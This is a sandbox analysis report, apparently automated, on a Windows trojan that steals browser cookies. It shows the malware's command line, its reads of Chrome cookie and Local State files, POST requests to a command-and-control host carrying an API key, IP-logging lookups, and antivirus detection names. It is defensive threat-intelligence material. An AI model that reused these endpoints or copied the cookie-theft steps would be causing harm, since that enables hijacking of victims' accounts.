Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | June 8, 2021, 10:43 a.m. | June 8, 2021, 10:46 a.m. |
-
-
jfiag3g_gg.exe C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\test22\AppData\Local\Temp\fj4ghga23_fsa.txt
5192 -
jfiag3g_gg.exe C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\test22\AppData\Local\Temp\fj4ghga23_fsa.txt
8728
-
Name | Response | Post-Analysis Lookup |
---|---|---|
uyg5wye.2ihsfa.com | 88.218.92.148 | |
script.google.com | 172.217.25.238 | |
iplogger.org | 88.99.66.31 | |
ip-api.com | 208.95.112.1 | |
www.facebook.com | 157.240.215.35 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49812 -> 157.240.215.35:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49806 -> 208.95.112.1:80 | 2022082 | ET POLICY External IP Lookup ip-api.com | Device Retrieving External IP Address Detected |
TCP 192.168.56.102:49818 -> 216.58.220.206:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49819 -> 216.58.220.206:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49820 -> 88.99.66.31:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49812 157.240.215.35:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com | 64:6a:5b:69:8b:12:93:b5:d8:b2:20:d5:3f:4e:74:04:ca:ba:95:5e |
TLSv1 192.168.56.102:49818 216.58.220.206:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com | 57:fe:cc:b1:d0:ea:5d:b5:1b:1a:76:b0:7d:03:26:a4:8d:1f:90:83 |
TLSv1 192.168.56.102:49819 216.58.220.206:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com | 57:fe:cc:b1:d0:ea:5d:b5:1b:1a:76:b0:7d:03:26:a4:8d:1f:90:83 |
TLSv1 192.168.56.102:49820 88.99.66.31:443 |
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.iplogger.org | 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb |
pdb_path | D:\workspace\workspace_c\GjOGoOIgHJEwh52iJ_20\Release\GjOGoOIgHJEwh52iJ_20.pdb |
resource name | HHGE |
suspicious_features | POST method with no referer header | suspicious_request | POST http://uyg5wye.2ihsfa.com/api/?sid=207933&key=e00ce96d56b1d7110bbce62b19af1adf |
request | GET http://ip-api.com/json/ |
request | GET http://uyg5wye.2ihsfa.com/api/fbtime |
request | POST http://uyg5wye.2ihsfa.com/api/?sid=207933&key=e00ce96d56b1d7110bbce62b19af1adf |
request | GET https://www.facebook.com/ |
request | GET https://script.google.com/macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?loc=KR&app=Staoism&payoutcents=0.08&ver=3.5&ip=175.208.134.150 |
request | GET https://iplogger.org/18hh57 |
request | POST http://uyg5wye.2ihsfa.com/api/?sid=207933&key=e00ce96d56b1d7110bbce62b19af1adf |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal |
name | HHGE | language | LANG_CHINESE | filetype | PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x000bc710 | size | 0x00033e00 | ||||||||||||||||||
name | HHGE | language | LANG_CHINESE | filetype | PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x000bc710 | size | 0x00033e00 | ||||||||||||||||||
name | HHGE | language | LANG_CHINESE | filetype | PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x000bc710 | size | 0x00033e00 |
domain | ip-api.com |
file | C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe |
file | C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe |
section | {u'size_of_data': u'0x00071800', u'virtual_address': u'0x0007f000', u'entropy': 7.891368917905341, u'name': u'.rsrc', u'virtual_size': u'0x00071690'} | entropy | 7.89136891791 | description | A section with a high entropy has been found | |||||||||
entropy | 0.46780010304 | description | Overall entropy of this PE file is high |
host | 172.217.25.14 |
file | C:\Users\test22\AppData\Local\Temp\fj4ghga23_fsa.txt |
file | C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe |
Bkav | W32.AIDetect.malware2 |
Elastic | malicious (high confidence) |
MicroWorld-eScan | Trojan.GenericKD.37021101 |
FireEye | Generic.mg.aed57d50123897b0 |
CAT-QuickHeal | PUA.IgenericRI.S15903427 |
McAfee | GenericRXAA-AA!AED57D501238 |
Cylance | Unsafe |
Zillya | Trojan.CookiesStealer.Win32.67 |
Sangfor | Trojan.Win32.Save.a |
K7AntiVirus | Trojan ( 005723511 ) |
Alibaba | Trojan:Win32/CookiesStealer.12a8497f |
K7GW | Trojan ( 005723511 ) |
CrowdStrike | win/malicious_confidence_80% (W) |
Cyren | W32/CookieStealer.E.gen!Eldorado |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | a variant of Win32/Agent.ACLN |
APEX | Malicious |
Paloalto | generic.ml |
ClamAV | Win.Malware.Spyagent-9830839-0 |
Kaspersky | Trojan.Win32.CookiesStealer.b |
BitDefender | Trojan.GenericKD.37021101 |
NANO-Antivirus | Riskware.Win32.PSWTool.hqsnsl |
AegisLab | Trojan.Win32.CookiesStealer.4!c |
Tencent | Malware.Win32.Gencirc.11bf8369 |
Ad-Aware | Trojan.GenericKD.37021101 |
Emsisoft | Trojan.Agent (A) |
Comodo | Malware@#dtfpxx1rbcg5 |
F-Secure | Trojan.TR/AD.JazoStealer.znvpf |
DrWeb | Trojan.PWS.Stealer.30443 |
VIPRE | Trojan.Win32.Generic!BT |
TrendMicro | TROJ_GEN.R002C0PE721 |
McAfee-GW-Edition | BehavesLike.Win32.PUP.dc |
Sophos | Mal/Generic-S |
eGambit | Unsafe.AI_Score_98% |
Avira | TR/AD.JazoStealer.znvpf |
MAX | malware (ai score=100) |
Antiy-AVL | Trojan/Generic.ASMalwS.2FFCE3E |
Kingsoft | Win32.Heur.KVM003.a.(kcloud) |
Gridinsoft | Trojan.Win32.Agent.vb |
Microsoft | Trojan:Win32/CookiesStealer.OE!MTB |
ZoneAlarm | not-a-virus:HEUR:PSWTool.Win32.PassView.a |
GData | Trojan.GenericKD.37021101 |
Cynet | Malicious (score: 100) |
AhnLab-V3 | Trojan/Win32.RL_Infostealer.R356907 |
BitDefenderTheta | Gen:NN.ZexaF.34722.8uW@a82JMxcj |
ALYac | Trojan.GenericKD.37021101 |
VBA32 | BScope.Trojan.Infospy |
Malwarebytes | Generic.Trojan.Malicious.DDS |
TrendMicro-HouseCall | TROJ_GEN.R002C0PE721 |
Rising | Stealer.Facebook!1.CC5B (CLASSIC) |